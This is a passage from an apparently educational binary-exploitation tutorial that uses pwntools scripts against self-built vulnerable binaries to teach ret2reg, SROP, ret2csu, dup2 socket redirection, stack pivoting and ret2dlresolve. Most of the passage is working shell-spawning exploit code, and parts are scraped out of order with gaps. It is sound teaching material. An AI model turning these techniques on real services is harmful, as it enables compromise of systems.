payload = flat(
'A' * 120, # padding
jmp_rsp, # RSP will be pointing to shellcode, so we jump there
asm(shellcraft.sh()) # place the shellcode
)
p.sendlineafter('RSP!\n', payload)
p.interactive()
sub rsp, 0x20
jmp rsp
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
jmp_rsp = next(elf.search(asm('jmp rsp')))
payload = b'A' * 120
payload += p64(jmp_rsp)
payload += asm('''
sub rsp, 10;
jmp rsp;
''')
pause()
p.sendlineafter('RSP!\n', payload)
p.interactive()
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
jmp_rsp = next(elf.search(asm('jmp rsp')))
payload = asm(shellcraft.sh())
payload = payload.ljust(120, b'A')
payload += p64(jmp_rsp)
payload += asm('''
sub rsp, 128;
jmp rsp;
''') # 128 we found with r2
p.sendlineafter('RSP!\n', payload)
p.interactive()
Controlling all registers at once
A sigreturn is a special type of syscall. The purpose of sigreturn is to return from the signal handler and to clean up the stack frame after a signal has been unblocked.
What this involves is storing all the register values on the stack. Once the signal is unblocked, all the values are popped back in (RSP points to the bottom of the sigreturn frame, this collection of register values).
By leveraging a sigreturn
, we can control all register values at once - amazing! Yet this is also a drawback - we can't pick-and-choose registers, so if we don't have a stack leak it'll be hard to set registers like RSP to a workable value. Nevertheless, this is a super powerful technique - especially with limited gadgets.
Quick shells and pointers
A one_gadget
is simply an execve("/bin/sh")
command that is present in gLIBC, and this can be a quick win with GOT overwrites - next time the function is called, the one_gadget
is executed and the shell is popped.
__malloc_hook
is a feature in C. The Official GNU site defines __malloc_hook
as:
The value of this variable is a pointer to the function that
malloc
uses whenever it is called.
To summarise, when you call malloc()
the function __malloc_hook
points to also gets called - so if we can overwrite this with, say, a one_gadget
, and somehow trigger a call to malloc()
, we can get an easy shell.
Luckily there is a tool written in Ruby called one_gadget
. To install it, run:
gem install one_gadget
And then you can simply run
one_gadget libc
Wait a sec - isn't malloc()
a heap function? How will we use it on the stack? Well, you can actually trigger malloc
by calling printf("%10000$c")
(this allocates too many bytes for the stack, forcing libc to allocate the space on the heap instead). So, if you have a format string vulnerability, calling malloc is trivial.
This is a hard technique to give you practise on, due to the fact that your libc
version may not even have working one_gadgets
. As such, feel free to play around with the GOT overwrite binary and see if you can get a one_gadget
working.
Remember, the value given by the one_gadget
tool needs to be added to libc base as it's just an offset.
To make it super simple, I made it in assembly using pwntools:
from pwn import *
context.arch = 'amd64'
context.os = 'linux'
elf = ELF.from_assembly(
'''
mov rdi, 0;
mov rsi, rsp;
sub rsi, 8;
mov rdx, 300;
syscall;
ret;
pop rax;
ret;
pop rdi;
ret;
pop rsi;
ret;
pop rdx;
ret;
'''
)
elf.save('vuln')
The binary contains all the gadgets you need! First it executes a read
syscall, writes to the stack, then the ret
occurs and you can gain control.
But what about the /bin/sh
? I slightly cheesed this one and couldn't be bothered to add it to the assembly, so I just did:
echo -en "/bin/sh\x00" >> vuln
As we mentioned before, we need the following layout in the registers:
RAX: 0x3b
RDI: pointer to /bin/sh
RSI: 0x0
RDX: 0x0
To get the address of the gadgets, I'll just do objdump -d vuln
. The address of /bin/sh
can be gotten using strings:
$ strings -t x vuln | grep bin
1250 /bin/sh
The offset from the base to the string is 0x1250
(-t x
tells strings
to print the offset as hex). Armed with all this information, we can set up the constants:
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
binsh = elf.address + 0x1250
POP_RAX = 0x10000018
POP_RDI = 0x1000001a
POP_RSI = 0x1000001c
POP_RDX = 0x1000001e
SYSCALL = 0x10000015
Now we just need to populate the registers. I'll tell you the padding is 8
to save time:
payload = flat(
'A' * 8,
POP_RAX,
0x3b,
POP_RDI,
binsh,
POP_RSI,
0x0,
POP_RDX,
0X0,
SYSCALL
)
p.sendline(payload)
p.interactive()
And wehey - we get a shell!
Using Registers to bypass ASLR
ret2reg simply involves jumping to register addresses rather than hardcoded addresses, much like Using RSP for Shellcode. For example, you may find RAX always points at your buffer when the ret
is executed, so you could utilise a call rax
or jmp rax
to continue from there.
The reason RAX is the most common for this technique is that, by convention, the return value of a function is stored in RAX. For example, take the following basic code:
#include <stdio.h>
int test() {
return 0xdeadbeef;
}
int main() {
test();
return 0;
}
If we compile and disassemble the function, we get this:
0x55ea94f68125 55 push rbp
0x55ea94f68126 4889e5 mov rbp, rsp
0x55ea94f68129 b8efbeadde mov eax, 0xdeadbeef
0x55ea94f6812e 5d pop rbp
0x55ea94f6812f c3 ret
As you can see, the value 0xdeadbeef
is being moved into EAX.
$ ROPgadget --binary vuln-64
Gadgets information
============================================================
0x0000000000401069 : add ah, dh ; nop dword ptr [rax + rax] ; ret
0x000000000040109b : add bh, bh ; loopne 0x40110a ; nop ; ret
0x0000000000401037 : add byte ptr [rax], al ; add byte ptr [rax], al ; jmp 0x401024
[...]
$ ROPgadget --binary vuln-64 | grep rdi
0x0000000000401096 : or dword ptr [rdi + 0x404030], edi ; jmp rax
0x00000000004011db : pop rdi ; ret
Any function that returns a pointer to the string once it acts on it is a prime target. There are many that do this, including stuff like gets()
, strcpy()
and fgets()
. We''l keep it simple and use gets()
as an example.
#include <stdio.h>
void vuln() {
char buffer[100];
gets(buffer);
}
int main() {
vuln();
return 0;
}
First, let's make sure that some register does point to the buffer:
$ r2 -d -A vuln
[0x7f8ac76fa090]> pdf @ sym.vuln
; CALL XREF from main @ 0x401147
┌ 28: sym.vuln ();
│ ; var int64_t var_70h @ rbp-0x70
│ 0x00401122 55 push rbp
│ 0x00401123 4889e5 mov rbp, rsp
│ 0x00401126 4883ec70 sub rsp, 0x70
│ 0x0040112a 488d4590 lea rax, [var_70h]
│ 0x0040112e 4889c7 mov rdi, rax
│ 0x00401131 b800000000 mov eax, 0
│ 0x00401136 e8f5feffff call sym.imp.gets ; char *gets(char *s)
│ 0x0040113b 90 nop
│ 0x0040113c c9 leave
â”” 0x0040113d c3 ret
Now we'll set a breakpoint on the ret
in vuln()
, continue and enter text.
[0x7f8ac76fa090]> db 0x0040113d
[0x7f8ac76fa090]> dc
hello
hit breakpoint at: 40113d
We've hit the breakpoint, let's check if RAX points to our register. We'll assume RAX first because that's the traditional register to use for the return value.
[0x0040113d]> dr rax
0x7ffd419895c0
[0x0040113d]> ps @ 0x7ffd419895c0
hello
And indeed it does!
We now just need a jmp rax
gadget or equivalent. I'll use ROPgadget for this and look for either jmp rax
or call rax
:
$ ROPgadget --binary vuln | grep -iE "(jmp|call) rax"
0x0000000000401009 : add byte ptr [rax], al ; test rax, rax ; je 0x401019 ; call rax
0x0000000000401010 : call rax
0x000000000040100e : je 0x401014 ; call rax
0x0000000000401095 : je 0x4010a7 ; mov edi, 0x404030 ; jmp rax
0x00000000004010d7 : je 0x4010e7 ; mov edi, 0x404030 ; jmp rax
0x000000000040109c : jmp rax
0x0000000000401097 : mov edi, 0x404030 ; jmp rax
0x0000000000401096 : or dword ptr [rdi + 0x404030], edi ; jmp rax
0x000000000040100c : test eax, eax ; je 0x401016 ; call rax
0x0000000000401093 : test eax, eax ; je 0x4010a9 ; mov edi, 0x404030 ; jmp rax
0x00000000004010d5 : test eax, eax ; je 0x4010e9 ; mov edi, 0x404030 ; jmp rax
0x000000000040100b : test rax, rax ; je 0x401017 ; call rax
There's a jmp rax
at 0x40109c
, so I'll use that. The padding up until RIP is 120
; I assume you can calculate this yourselves by now, so I won't bother showing it.
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
JMP_RAX = 0x40109c
payload = asm(shellcraft.sh()) # front of buffer <- RAX points here
payload = payload.ljust(120, b'A') # pad until RIP
payload += p64(JMP_RAX) # jump to the buffer - return value of gets()
p.sendline(payload)
p.interactive()
Awesome!
As with the syscalls, I made the binary using the pwntools ELF features:
from pwn import *
context.arch = 'amd64'
context.os = 'linux'
elf = ELF.from_assembly(
'''
mov rdi, 0;
mov rsi, rsp;
sub rsi, 8;
mov rdx, 500;
syscall;
ret;
pop rax;
ret;
''', vma=0x41000
)
elf.save('vuln')
It's quite simple - a read
syscall, followed by a pop rax; ret
gadget. You can't control RDI/RSI/RDX, which you need to pop a shell, so you'll have to use SROP.
Once again, I added /bin/sh
to the binary:
echo -en "/bin/bash\x00" >> vuln
First let's plonk down the available gadgets and their location, as well as the location of /bin/sh
.
from pwn import *
elf = context.binary = ELF('./vuln', checksec=False)
p = process()
BINSH = elf.address + 0x1250
POP_RAX = 0x41018
SYSCALL_RET = 0x41015
From here, I suggest you try the payload yourself. The padding (as you can see in the assembly) is 8
bytes until RIP, then you'll need to trigger a sigreturn
, followed by the values of the registers.
The triggering of a sigreturn
is easy - sigreturn is syscall 0xf
(15
), so we just pop that into RAX and call syscall
:
payload = b'A' * 8
payload += p64(POP_RAX)
payload += p64(0xf)
payload += p64(SYSCALL_RET)
Now the syscall looks at the location of RSP for the register values; we'll have to fake them. They have to be in a specific order, but luckily for us pwntools has a cool feature called a SigreturnFrame()
that handles the order for us.
frame = SigreturnFrame()
Now we just need to decide what the register values should be. We want to trigger an execve()
syscall, so we'll set the registers to the values we need for that:
frame.rax = 0x3b # syscall number for execve
frame.rdi = BINSH # pointer to /bin/sh
frame.rsi = 0x0 # NULL
frame.rdx = 0x0 # NULL
However, in order to trigger this we also have to control RIP and point it back at the syscall
gadget, so the execve actually executes:
frame.rip = SYSCALL_RET
We then append it to the payload and send.
payload += bytes(frame)
p.sendline(payload)
p.interactive()
from pwn import *
elf = context.binary = ELF('./vuln', checksec=False)
p = process()
BINSH = elf.address + 0x1250
POP_RAX = 0x41018
SYSCALL_RET = 0x41015
frame = SigreturnFrame()
frame.rax = 0x3b # syscall number for execve
frame.rdi = BINSH # pointer to /bin/sh
frame.rsi = 0x0 # NULL
frame.rdx = 0x0 # NULL
frame.rip = SYSCALL_RET
payload = b'A' * 8
payload += p64(POP_RAX)
payload += p64(0xf)
payload += p64(SYSCALL_RET)
payload += bytes(frame)
p.sendline(payload)
p.interactive()
As of , the CSU has been hardened to remove the useful gadgets. is the offendor, and it essentially removes __libc_csu_init
(as well as a couple other functions) entirely.
Unfortunately, changing this breaks the ABI (application binary interface), meaning that any binaries compiled in this way can not run on pre-2.34 glibc versions - which can make things quite annoying for CTF challenges if you have an outdated glibc version. Older compilations, however, can work on the newer versions.
Controlling registers when gadgets are lacking
ret2csu is a technique for populating registers when there is a lack of gadgets. More information can be found in the , but a summary is as follows:
When an application is dynamically compiled (compiled with libc linked to it), there is a selection of functions it contains to allow the linking. These functions contain within them a selection of gadgets that we can use to populate registers we lack gadgets for, most importantly __libc_csu_init
, which contains the following two gadgets:
The second might not look like a gadget, but if you look it calls r15 + rbx*8
. The first gadget chain allows us to control both r15
and rbx
in that series of huge pop
operations, meaning whe can control where the second gadget calls afterwards.
These gadget chains allow us, despite an apparent lack of gadgets, to populate the RDX and RSI registers (which are important for parameters) via the second gadget, then jump wherever we wish by simply controlling r15
and rbx
to workable values.
This means we can potentially pull off syscalls for execve
, or populate parameters for functions such as write()
.
File Descriptors and Sockets
File Descriptors are integers that represent conections to sockets or files or whatever you're connecting to. In Unix systems, there are 3
main file descriptors (often abbreviated fd) for each application:
These are, as shown above, standard input, output and error. You've probably used them before yourself, for example to hide errors when running commands:
Here you're piping stderr
to /dev/null
, which is the same principle.
Many binaries in CTFs use programs such as socat
to redirect stdin
and stdout
(and sometimes stderr
) to the user when they connect. These are super simple and often require no more than a replacement of
With the line
Others, however, implement their own socket programming in C. In these scenarios, stdin
and stdout
may not be shown back to the user.
The reason for this is every new connection has a different fd. If you listen in C, since fd 0-2 is reserved, the listening socket will often be assigned fd 3
. Once we connect, we set up another fd, fd 4
(neither the 3
nor the 4
is certain, but statistically likely).
In these scenarios, it's just as simple to pop a shell. This shell, however, is not shown back to the user - it's shown back to the terminal running the server. Why? Because it utilises fd 0
, 1
and 2
for its I/O.
Here we have to tell the program to duplicate the file descriptor in order to redirect stdin
and stderr
to fd 4
, and glibc provides a simple way to do so.
The dup
syscall (and C function) duplicates the fd and uses the lowest-numbered free fd. However, we need to ensure it's fd 4
that's used, so we can use dup2()
. dup2
takes in two parameters: a newfd
and an oldfd
. Descriptor oldfd
is duplicated to newfd
, allowing us to interact with stdin
and stdout
and actually use any shell we may have popped.
Note that the outlines how if newfd
is in use it is silently closed, which is exactly what we wish.
More on socat
socat
is a "multipurpose relay" often used to serve binary exploitation challenges in CTFs. Essentially, it transfers stdin
and stdout
to the socket and also allows simple forking capabilities. The following is an example of how you could host a binary on port 5000
:
Most of the command is fairly logical (and the rest you can look up). The important part is that in this scenario we don't have to , as socat
does it all for us.
What is important, however, is pty
mode. Because pty
mode allows you to communicate with the process as if you were a user, it takes in input literally - including DELETE characters. If you send a \x7f
- a DELETE
- it will literally delete the previous character (as shown shortly in my writeup). This is incredibly relevant because in 64-bit the \x7f
is almost always present in glibc addresses, so it's not quite so possible to avoid (although you could keep rerunning the exploit until the rare occasion you get an 0x7e...
libc base).
To bypass this we use the socat
pty
escape character \x16
and prepend it to any \x7f
we send across.
Duplicating the Descriptors
I'll include source.c
, but most of it is socket programming derived from . The two relevent functions - vuln()
and win()
- I'll list below.
Quite literally an easy .
Start the binary with ./vuln 9001
.
Basic setup, except it's a remote process:
I pass in a basic pattern and pause directly before:
Once the pause()
is reached, I hook on with radare2 and set a breakpoint at the ret
.
Ok, so the offset is 40
.
Should be fairly simple, right?
What the hell?
But if we look on the server itself:
A shell was popped there! This is the we talked about before.
So we have a shell, but no way to control it. Time to use dup2
.
As we know, we need to call dup2(newfd, oldfd)
. newfd
will be 4
(our connection fd) and oldfd
will be 0
and 1
(we need to call it twice to redirect bothstdin
and stdout
). Knowing what you do about , have a go at doing this and then caling win()
. The answer is below.
Since we need two parameters, we'll need to find a gadget for RDI and RSI. I'll use ROPgadget
to find these.
Plonk these values into the script.
Now to get all the calls to dup2()
.
And wehey - the file descriptors were successfully duplicated!
These kinds of chains are where pwntools' ROP capabilities really come into their own:
Works perfectly and is much shorter and more readable!
Obviously, you can do a ret2plt followed by a ret2libc, but that's really not the point of this. Try calling win()
, and to do that you have to populate the register rdx
. Try what we've talked about, and then have a look at the answer if you get stuck.
We can work out the addresses of the massive chains using r2, and chuck this all into pwntools.
Now we need to find a memory location that has the address of win()
written into it so that we can point r15
at it. I'm going to opt to call gets()
again instead, and then input the address. The location we input to is a fixed location of our choice, which is reliable. Now we just need to find a location.
To do this, I'll run r2 on the binary then dcu main
to contiune until main. Now let's check permissions:
The third location is RW, so let's check it out.
The address 0x404028
appears unused, so I'll write win()
there.
To do this, I'll just use the ROP class.
Now we have the address written there, let's just get the massive ropchain and plonk it all in
Don't forget to pass a parameter to the gets()
:
And we have successfully controlled RDX - without any RDX gadgets!
As you probably noticed, we don't need to pop off r12 or r13, so we can move POP_CHAIN
a couple of intructions along:
#include <stdio.h>
int win(int x, int y, int z) {
if(z == 0xdeadbeefcafed00d) {
puts("Awesome work!");
}
}
int main() {
puts("Come on then, ret2csu me");
char input[30];
gets(input);
return 0;
}
[...]
0x00401208 4c89f2 mov rdx, r14
0x0040120b 4c89ee mov rsi, r13
0x0040120e 4489e7 mov edi, r12d
0x00401211 41ff14df call qword [r15 + rbx*8]
0x00401215 4883c301 add rbx, 1
0x00401219 4839dd cmp rbp, rbx
0x0040121c 75ea jne 0x401208
0x0040121e 4883c408 add rsp, 8
0x00401222 5b pop rbx
0x00401223 5d pop rbp
0x00401224 415c pop r12
0x00401226 415d pop r13
0x00401228 415e pop r14
0x0040122a 415f pop r15
0x0040122c c3 ret
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
POP_CHAIN = 0x00401224 # pop r12, r13, r14, r15, ret
REG_CALL = 0x00401208 # rdx, rsi, edi, call [r15 + rbx*8]
[0x00401199]> dm
0x0000000000400000 - 0x0000000000401000 - usr 4K s r--
0x0000000000401000 - 0x0000000000402000 * usr 4K s r-x
0x0000000000402000 - 0x0000000000403000 - usr 4K s r--
0x0000000000403000 - 0x0000000000404000 - usr 4K s r--
0x0000000000404000 - 0x0000000000405000 - usr 4K s rw-
0x00401199]> pxq @ 0x0000000000404000
0x00404000 0x0000000000403e20 0x00007f7235252180 >@......!%5r...
0x00404010 0x00007f723523c5e0 0x0000000000401036 ..#5r...6.@.....
0x00404020 0x0000000000401046 0x0000000000000000 F.@.............
RW_LOC = 0x00404028
rop.raw('A' * 40)
rop.gets(RW_LOC)
rop.raw(POP_CHAIN)
rop.raw(0) # r12
rop.raw(0) # r13
rop.raw(0xdeadbeefcafed00d) # r14 - popped into RDX!
rop.raw(RW_LOC) # r15 - holds location of called function!
rop.raw(REG_CALL) # all the movs, plus the call
p.sendlineafter('me\n', rop.chain())
p.sendline(p64(elf.sym['win'])) # send to gets() so it's written
print(p.recvline()) # should receive "Awesome work!"
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
POP_CHAIN = 0x00401224 # pop r12, r13, r14, r15, ret
REG_CALL = 0x00401208 # rdx, rsi, edi, call [r15 + rbx*8]
RW_LOC = 0x00404028
rop.raw('A' * 40)
rop.gets(RW_LOC)
rop.raw(POP_CHAIN)
rop.raw(0) # r12
rop.raw(0) # r13
rop.raw(0xdeadbeefcafed00d) # r14 - popped into RDX!
rop.raw(RW_LOC) # r15 - holds location of called function!
rop.raw(REG_CALL) # all the movs, plus the call
p.sendlineafter('me\n', rop.chain())
p.sendline(p64(elf.sym['win'])) # send to gets() so it's written
print(p.recvline()) # should receive "Awesome work!"
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
rop = ROP(elf)
POP_CHAIN = 0x00401228 # pop r14, pop r15, ret
REG_CALL = 0x00401208 # rdx, rsi, edi, call [r15 + rbx*8]
RW_LOC = 0x00404028
rop.raw('A' * 40)
rop.gets(RW_LOC)
rop.raw(POP_CHAIN)
rop.raw(0xdeadbeefcafed00d) # r14 - popped into RDX!
rop.raw(RW_LOC) # r15 - holds location of called function!
rop.raw(REG_CALL) # all the movs, plus the call
p.sendlineafter('me\n', rop.chain())
p.sendline(p64(elf.sym['win']))
print(p.recvline())
0x004011a2 5b pop rbx
0x004011a3 5d pop rbp
0x004011a4 415c pop r12
0x004011a6 415d pop r13
0x004011a8 415e pop r14
0x004011aa 415f pop r15
0x004011ac c3 ret
0x00401188 4c89f2 mov rdx, r14 ; char **ubp_av
0x0040118b 4c89ee mov rsi, r13 ; int argc
0x0040118e 4489e7 mov edi, r12d ; func main
0x00401191 41ff14df call qword [r15 + rbx*8]
Name
fd
stdin
0
stdout
1
stderr
2
find / -name secret.txt 2>/dev/null
p = process()
p = remote(host, port)
socat tcp-l:5000,reuseaddr,fork EXEC:"./vuln",pty,stderr
Lack of space for ROP
Stack Pivoting is a technique we use when we lack space on the stack - for example, we have 16 bytes past RIP. In this scenario, we're not able to complete a full ROP chain.
During Stack Pivoting, we take control of the RSP register and "fake" the location of the stack. There are a few ways to do this.
Possibly the simplest, but also the least likely to exist. If there is one of these, you're quite lucky.
If you can find a pop <reg>
gadget, you can then use this xchg
gadget to swap the values with the ones in RSP. Requires about 16 bytes of stack space after the saved return pointer:
pop <reg> <=== return pointer
<reg value>
xchg <rag>, rsp
This is a very interesting way of stack pivoting, and it only requires 8 bytes.
Every function (except main
) is ended with a leave; ret
gadget. leave
is equivalent to
mov rsp, rbp
pop rbp
Note that the function ending therefore looks like
mov rsp, rbp
pop rbp
pop rip
That means that when we overwrite RIP the 8 bytes before that overwrite RBP (you may have noticed this before). So, cool - we can overwrite rbp
using leave
. How does that help us?
Well if we look at leave
again, we noticed the value in RBP gets moved to RSP! So if we call overwrite RBP then overwrite RIP with the address of leave; ret
again, the value in RBP gets moved to RSP. And, even better, we don't need any more stack space than just overwriting RIP, making it very compressed.
To display an example program, we will use the example given on the pwntools entry for ret2dlresolve:
#include <unistd.h>
void vuln(void){
char buf[64];
read(STDIN_FILENO, buf, 200);
}
int main(int argc, char** argv){
vuln();
}
pwntools contains a fancy Ret2dlresolvePayload
that can automate the majority of our exploit:
# create the dlresolve object
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])
rop.raw('A' * 76)
rop.read(0, dlresolve.data_addr) # read to where we want to write the fake structures
rop.ret2dlresolve(dlresolve) # call .plt and dl-resolve() with the correct, calculated reloc_offset
p.sendline(rop.chain())
p.sendline(dlresolve.payload) # now the read is called and we pass all the relevant structures in
Let's use rop.dump()
to break down what's happening.
[DEBUG] PLT 0x8049030 read
[DEBUG] PLT 0x8049040 __libc_start_main
[DEBUG] Symtab: 0x804820c
[DEBUG] Strtab: 0x804825c
[DEBUG] Versym: 0x80482a6
[DEBUG] Jmprel: 0x80482d8
[DEBUG] ElfSym addr: 0x804ce0c
[DEBUG] ElfRel addr: 0x804ce1c
[DEBUG] Symbol name addr: 0x804ce00
[DEBUG] Version index addr: 0x8048c26
[DEBUG] Data addr: 0x804ce00
[DEBUG] PLT_INIT: 0x8049020
[*] 0x0000: b'AAAA' 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[...]
0x004c: 0x8049030 read(0, 0x804ce00)
0x0050: 0x804921a <adjust @0x5c> pop edi; pop ebp; ret
0x0054: 0x0 arg0
0x0058: 0x804ce00 arg1
0x005c: 0x8049020 [plt_init] system(0x804ce24)
0x0060: 0x4b44 [dlresolve index]
0x0064: b'zaab' <return address>
0x0068: 0x804ce24 arg0
As we expected - it's a read
followed by a call to plt_init
with the parameter 0x0804ce24
. Our fake structures are being read in at 0x804ce00
. The logging at the top tells us where all the structures are placed.
[DEBUG] ElfSym addr: 0x804ce0c
[DEBUG] ElfRel addr: 0x804ce1c
[DEBUG] Symbol name addr: 0x804ce00
Now we know where the fake structures are placed. Since I ran the script with the DEBUG
parameter, I'll check what gets sent.
00000000 73 79 73 74 65 6d 00 61 63 61 61 61 a4 4b 00 00 │syst│em·a│caaa│·K··│
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 ce 04 08 │····│····│····│····│
00000020 07 c0 04 00 2f 62 69 6e 2f 73 68 00 0a │····│/bin│/sh·│·│
0000002d
system
is being written to 0x804ce00
- as the debug said the Symbol name addr
would be placed
After that, at 0x804ce0c
, the Elf32_Sym
struct starts. First it contains the table index of that string, which in this case is 0x4ba4
as it is a very long way off the actual table. Next it contains the other values on the struct, but they are irrelevant and so zeroed out.
At 0x804ce1c
that Elf32_Rel
struct starts; first it contains the address of the system
string, 0x0804ce00
, then the r_info
variable - if you remember this specifies the R_SYM
, which is used to link the SYMTAB
and the STRTAB
.
After all the structures we place the string /bin/sh
at 0x804ce24
- which, if you remember, was the argument passed to system
when we printed the rop.dump()
:
0x005c: 0x8049020 [plt_init] system(0x804ce24)
from pwn import *
elf = context.binary = ELF('./vuln', checksec=False)
p = elf.process()
rop = ROP(elf)
# create the dlresolve object
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])
rop.raw('A' * 76)
rop.read(0, dlresolve.data_addr) # read to where we want to write the fake structures
rop.ret2dlresolve(dlresolve) # call .plt and dl-resolve() with the correct, calculated reloc_offset
log.info(rop.dump())
p.sendline(rop.chain())
p.sendline(dlresolve.payload) # now the read is called and we pass all the relevant structures in
p.interactive()
Using a pop rsp gadget to stack pivot
FIrst off, let's grab all the gadgets. I'll use ROPgadget
again to do so:
$ ROPgadget --binary vuln | grep 'pop rsp'
0x0000000000401225 : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
$ ROPgadget --binary vuln | grep 'pop rdi'
0x000000000040122b : pop rdi ; ret
$ ROPgadget --binary vuln | grep 'pop rsi'
0x0000000000401229 : pop rsi ; pop r15 ; ret
Now we have all the gadgets, let's chuck them into the script:
POP_CHAIN = 0x401225 # RSP, R13, R14, R15, ret
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229
Let's just make sure the pop
works by sending a basic chain and then breaking on ret
and stepping through.
payload = flat(
'A' * 104,
POP_CHAIN,
buffer,
0, # r13
0, # r14
0 # r15
)
pause()
p.sendline(payload)
print(p.recvline())
If you're careful, you may notice the mistake here, but I'll point it out in a sec. Send it off, attach r2.
$r2 -d -A $(pidof vuln)
[0x7f96f01e9dee]> db 0x004011b8
[0x7f96f01e9dee]> dc
hit breakpoint at: 4011b8
[0x004011b8]> pxq @ rsp
0x7ffce2d4fc68 0x0000000000401225 0x00007ffce2d4fc00
0x7ffce2d4fc78 0x0000000000000000 0x00007ffce2d4fd68
You may see that only the gadget + 2 more values were written; this is because our buffer length is limited, and this is the reason we need to stack pivot. Let's step through the first pop
.
[0x004011b8]> ds
[0x00401225]> ds
[0x00401226]> dr rsp
0x7ffce2d4fc00
You may notice it's the same as our "leaked" value, so it's working. Now let's try and pop the 0x0
into r13
.
[0x00401226]> ds
[0x00401228]> dr r13
0x4141414141414141
What? We passed in 0x0
to the gadget!
Remember, however, that pop r13
is equivalent to mov r13, [rsp]
- the value from the top of the stack is moved into r13
. Because we moved RSP, the top of the stack moved to our buffer and AAAAAAAA
was popped into it - because that's what the top of the stack points to now.
Now we understand the intricasies of the pop, let's just finish the exploit off. To account for the additional pop
calls, we have to put some junk at the beginning of the buffer, before we put in the ropchain.
payload = flat(
0, # r13
0, # r14
0, # r15
POP_RDI,
0xdeadbeef,
POP_RSI_R15,
0xdeadc0de,
0x0, # r15
elf.sym['winner']
)
payload = payload.ljust(104, b'A') # pad to 104
payload += flat(
POP_CHAIN,
buffer # rsp - now stack points to our buffer!
)
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}')
POP_CHAIN = 0x401225 # RSP, R13, R14, R15, ret
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229
payload = flat(
0, # r13
0, # r14
0, # r15
POP_RDI,
0xdeadbeef,
POP_RSI_R15,
0xdeadc0de,
0x0, # r15
elf.sym['winner']
)
payload = payload.ljust(104, b'A') # pad to 104
payload += flat(
POP_CHAIN,
buffer # rsp
)
pause()
p.sendline(payload)
print(p.recvline())
Stack Pivoting
// gcc source.c -o vuln -no-pie
#include <stdio.h>
void winner(int a, int b) {
if(a == 0xdeadbeef && b == 0xdeadc0de) {
puts("Great job!");
return;
}
puts("Whelp, almost...?");
}
void vuln() {
char buffer[0x60];
printf("Try pivoting to: %p\n", buffer);
fgets(buffer, 0x80, stdin);
}
int main() {
vuln();
return 0;
}
It's fairly clear what the aim is - call winner()
with the two correct parameters. The fgets()
means there's a limited number of bytes we can overflow, and it's not enough for a regular ROP chain. There's also a leak to the start of the buffer, so we know where to set RSP to.
We'll try two ways - using pop rsp
, and using leave; ret
. There's no xchg
gadget, but it's virtually identical to just popping RSP anyway.
Since I assume you know how to calculate padding, I'll tell you there's 96 until we overwrite stored RBP and 104 (as expected) until stored RIP.
Just to get the basics out of the way, as this is common to both approaches:
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}')
Using leave; ret to stack pivot
By calling leave; ret
twice, as described, this happens:
mov rsp, rbp
pop rbp
mov rsp, rbp
pop rbp
By controlling the value popped into RBP, we can control RSP.
As before, but with a difference:
$ ROPgadget --binary vuln | grep 'leave'
0x000000000040117c : leave ; ret
LEAVE_RET = 0x40117c
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229
I won't bother stepping through it again - if you want that, check out the pop rsp walkthrough.
payload = flat(
'A' * 96,
buffer,
LEAVE_RET
)
pause()
p.sendline(payload)
print(p.recvline())
Essentially, that pops buffer
into RSP (as described previously).
You might be tempted to just chuck the payload into the buffer and boom, RSP points there, but you can't quite - as with the previous approach, there is a pop
instruction that needs to be accounted for - again, remember leave
is
mov rsp, rbp
pop rbp
So once you overwrite RSP, you still need to give a value for the pop rbp
.
payload = flat(
0x0, # account for final "pop rbp"
POP_RDI,
0xdeadbeef,
POP_RSI_R15,
0xdeadc0de,
0x0, # r15
elf.sym['winner']
)
payload = payload.ljust(96, b'A') # pad to 96 (just get to RBP)
payload += flat(
buffer,
LEAVE_RET
)
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}')
LEAVE_RET = 0x40117c
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229
payload = flat(
0x0, # rbp
POP_RDI,
0xdeadbeef,
POP_RSI_R15,
0xdeadc0de,
0x0,
elf.sym['winner']
)
payload = payload.ljust(96, b'A') # pad to 96 (just get to RBP)
payload += flat(
buffer,
LEAVE_RET
)
pause()
p.sendline(payload)
print(p.recvline())
Flaws with fork()
Some processes use fork()
to deal with multiple requests at once, most notably servers.
An interesting side-effect of fork()
is that memory is copied exactly. This means everything is identical - ELF base, libc base, canaries.
This "shared" memory is interesting from an attacking point of view as it allows us to do a byte-by-byte bruteforce. Simply put, if there is a response from the server when we send a message, we can work out when it crashed. We keep spamming bytes until there's a response. If the server crashes, the byte is wrong. If not, it's correct.
This allows us to bruteforce the RIP one byte at a time, essentially leaking PIE - and the same thing for canaries and RBP. 24 bytes of multithreaded bruteforce, and once you leak all of those you can bypass a canary, get a stack leak from RBP and PIE base from RIP.
I won't be making a binary for this (yet), but you can check out ippsec's Rope writeup for HTB - Rope root was this exact technique.
Still learning :)
Moving onto heap exploitation does not require you to be a god at stack exploitation, but it will require a better understanding of C and how concepts such as pointers work. From time to time we will be discussing the glibc source code itself, and while this can be really overwhelming, it's incredibly good practise.
I'll do everything I can do make it as simple as possible. Most references (to start with) will be hyperlinks, so feel free to just keep the concept in mind for now, but as you progress understanding the source will become more and more important.
When we are done with a chunk's data, the data is freed using a function such as free()
. This tells glibc that we are done with this portion of memory.
